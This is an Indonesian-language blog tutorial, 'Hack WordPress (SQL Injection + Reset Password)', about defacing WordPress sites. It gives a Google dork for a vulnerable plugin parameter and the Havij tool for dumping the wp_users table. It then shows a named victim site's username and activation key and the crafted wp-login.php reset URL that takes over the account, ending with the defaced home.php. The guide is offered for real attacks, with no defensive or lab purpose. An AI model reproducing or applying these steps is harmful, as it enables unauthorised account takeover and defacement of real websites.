Hack WordPress (SQL Injection + Reset Password)

Hack WordPress (SQL Injection + Reset Password) merupakan salah satu cara yang dapat kita gunakan untuk mendeface Blog WordPress. Okeh karena caranya disini lumayan panjang jadi gak usah basa-basi dulu deh langsung aja kita mulai
Pertama kita siapin dulu bahan-bahan yang dibutuhkan demi lancarnya aksi kita kali ini, hehe..
Kompie terhubung internet
Havij (maklum lammer jadi masih pake tool, yang dewa manual aja yah)
dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )


Kesabaran dalam mencari target
Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal ) hehehe


saya beri contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian “userid=” di tambahin tulisan ” fb” jadi bentuknya seperti ini http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14





kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user lah,kalau udah ketemu caricolumn user_login dan user_activation_key

heheh…dah ketemu tuh yang kita cari,


username:pico
Activation key: GBasuGIZFtbUjpP3MvWb


sekarang kita gunakan exploitnya yaitu

wp-login.php?action=rp&key=“kode aktivasi”&login=“user login”


jadi alamatnya tadi dirubah seperti ini http://www.40sale.com/wp-login.php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico





sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal login dan melakukan sekehendak kita








saya cukup ngedit home.php nya aja dah,hehehe






buseeeet hasilnya kelam banget dah…sory ya min

Share this post